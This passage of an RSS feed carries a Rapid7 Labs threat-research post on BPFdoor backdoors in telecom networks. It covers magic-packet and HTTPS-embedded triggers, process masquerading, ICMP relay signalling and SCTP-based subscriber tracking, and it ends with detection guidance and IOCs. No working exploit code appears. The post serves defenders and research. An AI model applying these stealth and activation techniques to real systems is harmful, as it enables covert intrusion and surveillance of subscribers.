edge devices and core routing systems. Just as with the Cross C2 configuration, investing reveals the C2 server. For example:</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9c5269f973e9760e/69c3f5f42c3765849ae5f609/Cross-C2-configuration-rapid7-telecom-research.png" alt="Cross-C2-configuration-rapid7-telecom-research.png" caption="Figure 3: CrossC2 configuration" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Cross-C2-configuration-rapid7-telecom-research.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9c5269f973e9760e/69c3f5f42c3765849ae5f609/Cross-C2-configuration-rapid7-telecom-research.png" data-sys-asset-uid="blt9c5269f973e9760e" data-sys-asset-filename="Cross-C2-configuration-rapid7-telecom-research.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: CrossC2 configuration" data-sys-asset-alt="Cross-C2-configuration-rapid7-telecom-research.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: CrossC2 configuration</figcaption></div></figure><p>⠀</p><h4><span style='color:rgb(67, 67, 67);'>TinyShell</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>For long-term persistence, actors often rely on TinyShell, an open-source passive backdoor framework repurposed and customized by multiple APT groups. TinyShell is frequently observed on boundary devices such as firewalls, VPN appliances, and virtualization hosts. Compiled for Linux and FreeBSD, it is designed with stealth in mind: minimal network footprint, passive communication model, and reliable remote command execution capabilities. </span></p><h4><span style='color:rgb(67, 67, 67);'>Keyloggers and bruteforcers</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>After foothold establishment, attackers focus on persistence and lateral movement. Tooling such as Sliver, CrossC2, and TinyShell are complemented by SSH brute forcers and custom ELF-based keyloggers. In some cases, operators deploy brute-force utilities containing pre-populated credential lists tailored for telecom environments, even including specific usernames like “imsi,” referencing subscriber identity systems. This level of contextual awareness indicates reconnaissance and targeting aligned with telecom operational terminology. The goal is clear: move laterally, harvest credentials, and reach control-plane systems where subscriber data and signaling infrastructure reside.</span></p><h3>BPFdoor</h3><p style="direction: ltr;"><span style='font-size: undefined;'>BPFdoor first came to broader public attention around 2021, when researchers uncovered a stealthy Linux backdoor used in long-running espionage campaigns targeting telecommunications and government networks. The BPFDoor source code reportedly leaked online in 2022, making the previously specialized Linux backdoor more accessible to other threat actors. Normally, BPF is used by tools like tcpdump or libpcap to capture specific network traffic, such as filtering for TCP port 443. It operates partly in kernel space, meaning it processes packets before they reach user-space applications.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>BPFdoor abuses this capability. Rather than binding to a visible listening port, the implant installs a custom BPF filter inside the kernel that inspects incoming packets for a specific pattern, a predefined sequence of bytes often referred to as a “magic packet” or “magic byte.” If the pattern does not match, nothing happens. The traffic continues as normal. No open port or obvious process-accepting connections. But when the correct sequence is delivered to the correct destination port, the behavior changes instantly.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17abe00687115be1/69c3f660d2164c9267658b24/BPF-overview-variants-bpfdoor-rapid7-research-chart.png" alt="BPF-overview-variants-bpfdoor-rapid7-research-chart.png" caption="Figure 4: Overview of BPF and how early BPFdoor variants are operating" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="BPF-overview-variants-bpfdoor-rapid7-research-chart.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17abe00687115be1/69c3f660d2164c9267658b24/BPF-overview-variants-bpfdoor-rapid7-research-chart.png" data-sys-asset-uid="blt17abe00687115be1" data-sys-asset-filename="BPF-overview-variants-bpfdoor-rapid7-research-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Overview of BPF and how early BPFdoor variants are operating" data-sys-asset-alt="BPF-overview-variants-bpfdoor-rapid7-research-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: Overview of BPF and how early BPFdoor variants are operating</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Imagine retrieving a parcel from a secure pickup locker. The locker sits quietly in public view, no alarms, no obvious signs of activity. It only opens when the correct code is entered.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>BPFdoor behaves the same way.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The implant remains dormant inside the Linux kernel, passively inspecting network traffic. It does not advertise itself. It does not respond to scans. But when an operator sends the correct “code”, the specific magic byte sequence embedded in a crafted packet, the BPF filter recognizes the pattern and triggers the next stage.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Instead of opening a physical door, it spawns a bind shell or reverse shell. Importantly, this activation can occur without a traditional listening service ever being visible in netstat or ss. To a defender, the system appears clean; there is no persistent open port to detect.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Before we showcase this, something important to note is that BPFdoor operations consist of two distinct components: the implant and the controller. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The implant is the passive backdoor deployed on the compromised Linux system, where it installs a malicious BPF filter and silently inspects incoming traffic for a predefined “magic” packet. It does not continuously beacon or expose a listening port, making it extremely stealthy. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The controller, on the other hand, is operated by the attacker and is responsible for crafting and sending the specially formatted packets that activate the backdoor and establish a remote shell. While it can be run from attacker-controlled infrastructure such as compromised routers or external systems, the controller is also designed to operate within the victim’s environment itself. In this mode it can masquerade as legitimate system processes and trigger additional implants across internal hosts by sending activation packets or by opening a local listener to receive shell connections, effectively enabling controlled lateral movement between compromised systems. In essence, the implant acts as the hidden lock embedded within the system, while the controller functions as the key that can activate it. A deeper technical analysis of the controller architecture and its role in lateral movement will be covered in a forthcoming technical blog.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To demonstrate how these first backdoors work, we created the video below, in which we are running a BPFdoor made visible. Next, we send the magic packet and instructions to the IP address and port we are listening on. Then the BPFdoor opens up the “safe” and creates the tunnel. In the final part of the demo, we see that on our Netcat listener, we have a remote shell and can query the system.</span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Next, we will highlight how we started to hunt for BPFdoor.</span></p><h4><span style='color:rgb(67, 67, 67);'>Hunting for BPFdoor variants</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Since we were aware of several BPFdoor attacks and samples circulating, we started hunting for more samples and developed internal tools to extract, compare, and detect early indicators of new features. One threat hunting angle Rapid7 Labs really loves to focus on is code similarity of samples. Code similarity of malware samples can result in clusters of samples with similar activity, but most importantly, also demonstrate outliers that are potential candidates for research since they do not share commodity with the other samples.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The BPFdoor samples we collected and hunted for are all Executable and Linkable Format (ELF) files, but we are aware of samples compiled for running on Solaris. ELF is the standard binary file format for executables, object code, shared libraries, and core dumps on Linux and Unix-like operating systems.</span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>For the ELF files, we wrote a custom tool for clustering ELF/BPFdoor. By extracting .text section byte code blocks, generating MinHash signatures, and completing a few other steps, it will then compute exact Jaccard similarity and export the resulting similarity graph for visual cluster analysis.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blteab862f984376be8/69c3f89aaa4cbed5d1832d7d/Code-Similarity-clustering-BPFdoor-samples.png" alt="Code-Similarity-clustering-BPFdoor-samples.png" caption="Figure 5: Code Similarity clustering of BPFdoor samples" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Code-Similarity-clustering-BPFdoor-samples.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blteab862f984376be8/69c3f89aaa4cbed5d1832d7d/Code-Similarity-clustering-BPFdoor-samples.png" data-sys-asset-uid="blteab862f984376be8" data-sys-asset-filename="Code-Similarity-clustering-BPFdoor-samples.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5: Code Similarity clustering of BPFdoor samples" data-sys-asset-alt="Code-Similarity-clustering-BPFdoor-samples.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5: Code Similarity clustering of BPFdoor samples</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>In our visualization, we clearly observe certain clusters of BPFdoor, but also outliers and smaller clusters that were up for investigation. The thicker the line, the more similar the code is to the samples it is attached to. By creating a feature comparison/extraction tool, we started to discover interesting features in the samples, which led us to a new controller discovery and security bypass feature. For example, we discovered a variant we dubbed “F” that uses a 26 BPF instruction filter with</span><span style='color:rgb(29, 28, 29);font-size: undefined;'> new magic packets.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Although it was previously reported that some samples support the Stream Control Transmission Protocol (SCTP), there is a tendency to read over it and not put it into the right context of what the consequences are. SCTP is not typical enterprise traffic; it underpins Public Switch Telephone Network (PSTN) signaling and real-time communication between core 4G and 5G network elements. By configuring BPF filters to inspect SCTP traffic directly, operators are no longer just maintaining server access, they are embedding themselves into the signaling plane of the telecom network. This is a fundamentally different level of positioning. Instead of sitting at the IT perimeter, the implant resides adjacent to the mechanisms that route calls, authenticate devices, and manage subscriber mobility.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6093f59f01ab6f7f/69c3f8f01fa3286f55253f03/Example-SCTP-route-extracted-BPF-code.png" alt="Example-SCTP-route-extracted-BPF-code.png" caption="Figure 6: Example of SCTP route extracted from the BPF code" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Example-SCTP-route-extracted-BPF-code.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6093f59f01ab6f7f/69c3f8f01fa3286f55253f03/Example-SCTP-route-extracted-BPF-code.png" data-sys-asset-uid="blt6093f59f01ab6f7f" data-sys-asset-filename="Example-SCTP-route-extracted-BPF-code.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6: Example of SCTP route extracted from the BPF code" data-sys-asset-alt="Example-SCTP-route-extracted-BPF-code.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6: Example of SCTP route extracted from the BPF code</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Access to SCTP traffic opens powerful intelligence collection opportunities. In legacy and transitional environments, improperly secured signaling can expose SMS message contents, IMSI identifiers, and source/destination metadata. By observing or manipulating traffic over SCTP commands such as ProvideSubscriberLocation or UpdateLocation, an adversary can track a device’s real-world movement. In 5G environments, traffic over SCTP carries registration requests and Subscription Concealed Identifiers (SUCI), allowing identity probing at scale. At this point, the compromise is no longer about server persistence; it becomes population-level visibility into subscriber behavior and location. Translated, you could track individuals of interest. </span></p><h3>Interesting observations</h3><h4><span style='color:rgb(67, 67, 67);'>The bare-metal to telecom equipment link</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>During the code investigations, we discovered that some BPFdoor samples are using code to mimic the bare-metal infrastructure, particularly enterprise-grade hardware platforms commonly deployed in telecom environments. By masquerading as legitimate system services that run only on bare metal, the implant blends into operational noise. This is especially relevant in environments leveraging HPE ProLiant and similar high-performance compute systems used for 5G core and edge deployments. </span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b7dc27f659b2203/69c3f943aa4cbe5bfa832d83/Example-code-mimicking-HP-Proliant-servers.png" alt="Example-code-mimicking-HP-Proliant-servers.png" caption="Figure 7: Example of code mimicking HP Proliant servers" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Example-code-mimicking-HP-Proliant-servers.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b7dc27f659b2203/69c3f943aa4cbe5bfa832d83/Example-code-mimicking-HP-Proliant-servers.png" data-sys-asset-uid="blt8b7dc27f659b2203" data-sys-asset-filename="Example-code-mimicking-HP-Proliant-servers.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7: Example of code mimicking HP Proliant servers" data-sys-asset-alt="Example-code-mimicking-HP-Proliant-servers.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7: Example of code mimicking HP Proliant servers</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>In the above screenshot of one of the BPFdoor samples, we observed the processname </span><span style='font-size: undefined;'><em>“hpaslimited”.</em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By mimicking legitimate service names and process behavior of HPE ProLiant servers, attackers ensure the implant appears native to the hardware environment, a tactic that significantly complicates detection. Several of these service names have been observed in BPFdoor samples, but this name stood out. The </span><span style='font-size: undefined;'><em>hpasmlited.pid</em></span><span style='font-size: undefined;'> creates process threads, and mimics daemon-style behavior consistent with hardware monitoring services. The real </span><span style='font-size: undefined;'><em>hpasmlited</em></span><span style='font-size: undefined;'> process belongs to HPE’s Agentless Management Service, which runs on bare-metal ProLiant servers to expose hardware telemetry and system health data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By adopting this name and writing a corresponding PID file, the malware blends into expected operational noise on telecom-grade ProLiant infrastructure. Of course this is not accidental naming, it demonstrates environment awareness and targeting intent. The operators appear to know they are running on physical HPE hardware commonly deployed in 4G/5G core and edge systems. By impersonating a trusted hardware management daemon that administrators expect to see, the implant reduces suspicion during forensic review while embedding itself directly into the physical backbone layer of telecom infrastructure. This tactic reflects a broader strategy: hide not just in Linux, but in the hardware identity of the telecom environment itself.</span></p><h4><span style='color:rgb(67, 67, 67);'>Mimicking containers</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>A second strategy involves spoofing core containerization components. Critical 5G core components such as the Access and Mobility Management Function (AMF), Session Management Function (SMF), and User Data Management (UDM) run as cloud native network functions inside Kubernetes pods. The following code excerpt demonstrates that the implant is aware of it.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt15fab2f9859d7968/69c3fadccfd9c95b99968e3e/Code-mimicking-container-docker-service.png" alt="Code-mimicking-container-docker-service.png" caption="Figure 8: Code showing the mimicking of container/docker service" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Code-mimicking-container-docker-service.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt15fab2f9859d7968/69c3fadccfd9c95b99968e3e/Code-mimicking-container-docker-service.png" data-sys-asset-uid="blt15fab2f9859d7968" data-sys-asset-filename="Code-mimicking-container-docker-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Code showing the mimicking of container/docker service" data-sys-asset-alt="Code-mimicking-container-docker-service.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8: Code showing the mimicking of container/docker service</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Docker Daemon (/usr/bin/dockerd) and containerd: The malware is executed with root privileges and adopts the exact command-line arguments of a legitimate Docker daemon (e.g., -H fd:// --containerd=/run/containerd/containerd.sock).</span></p><h2>Recap for a moment</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Up to this point, what we’ve described in our technical analysis has, more or less, been publicly available information; however, these pieces have not been assembled in a way that provides the context Rapid7 Labs has discovered through its in-depth investigation. Therefore, before we deep dive into some of the new technical findings that completes the picture of what is truly happening here, let’s pause for a moment to sync up on what we’ve just described. </span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>So far, our findings illustrate that BPFdoor is far more than a stealthy Linux backdoor. The kernel-level packet filtering, passive activation through magic packets, masquerading as legitimate hardware management services, awareness of container runtimes, and the ability to monitor telecom-native protocols such as SCTP, point to a tool designed for deep infrastructure positioning. Rather than targeting individual servers, the operators appear to focus on the underlying platforms that power modern telecommunications networks: bare-metal systems running telecom workloads, cloud-native Kubernetes environments hosting Containerized Network Functions, and the signaling protocols that coordinate subscriber identity, mobility, and communication flows. In this context, BPFdoor functions as an access layer embedded within the telecom backbone, providing long-term, low-noise visibility into critical network operations.</span></p><h2>What Rapid7 found in newer BPFdoor variants</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following sections provide a high-level overview of several newly observed capabilities and behavioral patterns in recent BPFdoor samples. While these findings highlight important technical developments, this blog intentionally focuses on the architectural implications and operational context rather than a full reverse-engineering deep dive. Detailed technical analyses, including code-level breakdowns, will be published in upcoming research posts.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>During our investigation, we identified a previously undocumented variant of BPFdoor that introduces several architectural changes designed to improve stealth and survivability in modern enterprise and telecom environments. We will highlight these features and illustrate how the malware continues to evolve beyond the earlier “magic packet” activation model.</span></p><h3>Network-level invisibility: The BPF trapdoor</h3><p style="direction: ltr;"><span style='font-size: undefined;'>As we described before, the early BPFdoor installed a Berkeley Packet Filter inside the Linux kernel that inspected incoming network traffic. When a specially crafted “magic packet” containing a predefined byte sequence arrived at the correct port, the backdoor would activate and spawn a shell. Because the system never actually opened a port, tools such as netstat, ss, or nmap saw nothing unusual.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The newly observed variant evolves this concept. Instead of relying on a simple magic packet that could potentially be detected by intrusion detection signatures, the trigger is now embedded within seemingly legitimate HTTPS traffic. The attacker sends a carefully crafted request that travels through standard network infrastructure such as reverse proxies, load balancers, or web application firewalls. Once the traffic reaches the compromised host and is decrypted as part of normal SSL termination, the hidden command sequence can be extracted and used to activate the backdoor. In essence, in our previously mentioned analogy explaining the magic packet mechanism, the safe still requires a code, but now the code is concealed inside normal, encrypted web traffic, allowing it to pass through modern security controls before unlocking the trapdoor.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt500701fb86b66cc2/69c3fb57da444da18ef7ef2a/bpfdoor-controller-weaponizes-ssl-termination-chart.png" alt="bpfdoor-controller-weaponizes-ssl-termination-chart.png" caption="Figure 9: Overview of how the new sample communicates" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="bpfdoor-controller-weaponizes-ssl-termination-chart.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt500701fb86b66cc2/69c3fb57da444da18ef7ef2a/bpfdoor-controller-weaponizes-ssl-termination-chart.png" data-sys-asset-uid="blt500701fb86b66cc2" data-sys-asset-filename="bpfdoor-controller-weaponizes-ssl-termination-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Overview of how the new sample communicates" data-sys-asset-alt="bpfdoor-controller-weaponizes-ssl-termination-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9: Overview of how the new sample communicates</figcaption></div></figure><h3>Layer 7 camouflage and the “magic ruler”</h3><p style="direction: ltr;"><span style='font-size: undefined;'>To remain reliable across proxy layers, the attackers introduced a clever parsing mechanism. HTTP proxies often modify headers by inserting additional fields such as client IP addresses, timestamps, or routing metadata. These changes can shift the position of data within the request and break traditional signature-based triggers. To solve this problem, the attackers designed a mathematical padding scheme that ensures a specific marker, in the observed samples the string </span><span style='font-size: undefined;'><em>“9999”</em></span><span style='font-size: undefined;'>, always appears at a fixed byte offset within the request.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is where the 26-byte or 40-byte “magic ruler” comes into play. Rather than parsing the entire HTTP header, which can vary depending on proxy behavior, the malware treats the request body as a predictable coordinate space. By carefully padding the HTTP request with filler bytes, the attacker ensures that the marker always lands exactly at the 26th byte offset of the inspected data structure. The implant simply checks this fixed position; if the marker appears at that byte location, it interprets the surrounding data as the activation command.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because the header itself can fluctuate while the padded payload remains predictable, the malware does not need to understand or parse the full HTTP structure. Instead, it relies on this fixed “measurement point”, effectively using the 26-byte offset as a ruler inside the packet. This technique allows the trigger to survive proxy rewriting and header injection while still remaining hidden inside otherwise normal HTTPS traffic. The 26-byte rule is used in case of a socket creation with the “SOCK_DGRAM” flags, but in case of a “SOCK_RAW” flag, it will use a 40-byte ruler.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In practice, this turns the messy, variable HTTP protocol into something the malware can treat like a fixed coordinate system, enabling what could be described as dynamic Layer-7 camouflage, a surprisingly simple but effective technique for hiding command triggers inside legitimate encrypted web traffic.</span></p><h4><span style='color:rgb(67, 67, 67);'>The RC4-MD5 paradox</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Another interesting feature of the new controller is its continued use of the legacy RC4-MD5 encryption routine. While this combination is considered deprecated in modern cryptographic standards, it still appears in several malware samples. In this case, the RC4-MD5 implementation is not part of TLS, but rather a lightweight encryption layer applied to the interactive command-and-control channel after the backdoor is activated. RC4 provides extremely fast stream encryption suitable for interactive shells, introducing minimal latency during command execution. In addition, the use of older or non-standard encryption routines can sometimes confuse inspection systems, particularly when traffic does not follow typical protocol expectations. Finally, reuse of older cryptographic modules often reflects code lineage and operational efficiency, adversaries frequently recycle proven components across campaigns. In this case, code comparison revealed similarities with routines that have circulated in Chinese-nexus malware families such as RedXOR and PWNIX for several years.</span></p><h4><span style='color:rgb(67, 67, 67);'>ICMP control channel: “phone home”</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>While earlier BPFdoor variants focused primarily on covert activation, the new sample also introduces a lightweight communication mechanism built around Internet Control Message Protocol (ICMP). The code excerpt shows the malware preparing an ICMP payload and inserting a specific value  </span><span style='font-size: undefined;'><em>“0xFFFFFFFF”</em></span><span style='font-size: undefined;'>  into a field before transmitting the packet using a dedicated routine (</span><span style='font-size: undefined;'><em>send_ICMP_data</em></span><span style='font-size: undefined;'>). At first glance this appears trivial, but the logic reveals something more interesting: The ICMP packet is not just a signal back to the operator, it is also used as a control mechanism between compromised systems.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5088507ce2a7ed38/69c3fba802cb98225b1d64ca/ICMP-tunneling-rapid7-labs-research-chart.png" alt="ICMP-tunneling-rapid7-labs-research-chart.png" caption="Figure 10: ICMP Tunneling" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ICMP-tunneling-rapid7-labs-research-chart.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5088507ce2a7ed38/69c3fba802cb98225b1d64ca/ICMP-tunneling-rapid7-labs-research-chart.png" data-sys-asset-uid="blt5088507ce2a7ed38" data-sys-asset-filename="ICMP-tunneling-rapid7-labs-research-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: ICMP Tunneling" data-sys-asset-alt="ICMP-tunneling-rapid7-labs-research-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 10: ICMP Tunneling</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>In this model, ICMP functions as a minimal command channel between infected hosts. One compromised server can forward specially crafted ICMP packets to another, effectively passing along execution instructions without requiring traditional command-and-control traffic. The key marker in this mechanism is the value 0xFFFFFFFF (signed as -1), which acts as a destination signal embedded inside the packet structure. When a receiving host detects this value, it interprets the packet as a terminal instruction rather than something to be forwarded further.</span></p><p style="direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>In practical terms, </span><span style='color:rgb(29, 28, 29);font-size: undefined;'><em>Server A is telling Server B: “You are the final destination.”</em></span><span style='color:rgb(29, 28, 29);font-size: undefined;'> Instead of relaying the signal onward, the receiving system executes the next stage, typically triggering the reverse shell or command handler. This simple signaling mechanism allows the operators to control how far a command propagates through compromised infrastructure without introducing additional protocol complexity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What makes this mechanism notable is its simplicity. Rather than expanding the structure of the activation packet or introducing additional fields, the attackers reuse an existing value within the packet structure to signal the end of the chain. By setting this field to 0xFFFFFFFF, they effectively create a “do not forward” flag inside their communication channel. This allows them to manage hop behavior across compromised nodes while keeping the packet format compact and consistent. </span></p><h2>Key takeaways</h2><p style="direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>Taken together, the newly observed capabilities demonstrate how BPFdoor has evolved beyond a stealth backdoor into a layered access framework. The updated variant combines encrypted HTTPS triggers, proxy-aware command delivery, application-layer camouflage techniques, ICMP-based control signals, and kernel-level packet filtering to bypass multiple layers of modern network defenses. Each technique targets a different security boundary, from TLS inspection at the edge, to IDS detection in transit, and endpoint monitoring on the host, illustrating a deliberate effort to operate across the full defensive stack.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Kernel-level backdoors are redefining stealth.</strong></span><br/><span style='font-size: undefined;'>Tools like BPFdoor operate below traditional visibility layers, abusing Berkeley Packet Filter mechanisms to create network listeners that do not expose ports, processes, or conventional command-and-control indicators.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Telecommunications infrastructure is a prime espionage target.</strong></span><br/><span style='font-size: undefined;'>Modern 4G and 5G networks rely on complex stacks of signaling systems, Containerized Network Functions, and high-performance infrastructure. Access to these environments can enable long-term intelligence collection, subscriber monitoring, and deep visibility into national communications infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Security controls can be turned into delivery mechanisms.</strong></span><br/><span style='font-size: undefined;'>In the latest BPFdoor variant, attackers weaponize normal security workflows. Traffic that passes through TLS termination and deep packet inspection can deliver malicious commands once it reaches the decrypted internal zone.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>BPF-based implants are likely the beginning of a larger trend.</strong></span><br/><span style='font-size: undefined;'>BPFdoor and new eBPF malware families like Symbiote demonstrate how kernel packet filtering can be abused for stealth persistence. As defenders improve visibility at higher layers, adversaries are increasingly shifting implants deeper into the operating system.</span></p><h2>How defenders can detect BPFdoor activity</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Detecting these threats requires shifting visibility deeper into the operating system and network stack, focusing on indicators such as unusual raw socket usage, anomalous packet filtering behavior, and unexpected service masquerading on critical infrastructure hosts. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To support defenders in identifying potential BPFdoor activity, we developed a </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/BPFDoor/README.md" target="_blank"><span style='font-size: undefined;'>scanning script</span></a><span style='font-size: undefined;'> designed to detect both previously documented variants and the newer samples discussed in this research. The script focuses on identifying indicators associated with the stealth activation mechanism, kernel-level packet filtering behavior, and process masquerading techniques used by BPFdoor implants. By combining checks for known artifacts and behavioral patterns, the scanner helps security teams quickly assess whether systems may be impacted.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We are making this tool available to the community to assist organizations in proactively identifying potential compromises. The scanner can be used across Linux environments to search for artifacts linked to BPFdoor activity, including indicators observed in both historical samples and the latest variant analyzed during this research. Our goal is to help defenders rapidly validate exposure and begin incident response investigations where necessary.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In the video below, </span><span style='color:rgb(29, 28, 29);font-size: undefined;'>Rapid7 Labs demonstrates how our detection script would be run within the system of an infected victim organization. The video starts with the right window, showing that the BPFdoor backdoor is running and the particular services that relate are highlighted. Then, in the bottom left screen, the BPFdoor is activated by sending the right packet sequence and password, whereby a remote control shell is established. The attacker is running some commands on the victim machine and shows it can execute remote commands. Finally, in the top window, we run our developed detection script that will show the detected processes, and the alerts are showcased.  </span></p><p>⠀</p><p>⠀</p><h2>Indicators of compromise (IOCs)</h2><p>The IOCs we discovered during our investigation surrounding the new controller, as well as samples and other relevant data, can be found on our <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/BPFDoor" target="_blank">Rapid7 Labs Github page</a>.</p><h2>Interested in learning more?</h2><p>Catch <a href="https://www.brighttalk.com/webcast/10457/665136?utm_source=blog&amp;utm_medium=website&amp;utm_content=project-matrix&amp;utm_campaign=na-pla-q1-2026-global-webinar-prospect-eng" target="_blank">Sleeper Cells in the Telecom Backbone, Rapid7’s webinar</a> via BrightTalk, led by Raj Samani, Chief Scientist, and Christiaan Beek, VP of Threat Analytics.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report</link>
      <guid isPermaLink="false">blt02e8114202e02964</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Threat Intel]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Thu, 26 Mar 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb0f63eea90d6a4a4/69c401e47dde026107d319ac/rapid7-sleeper-cells-telecom-backbone-hero-version2.jpeg" medium="image" />
    </item>
    <item>
      <title><![CDATA[The Attack Cycle is Accelerating: Announcing the Rapid7 2026 Global Threat Landscape Report]]></title>
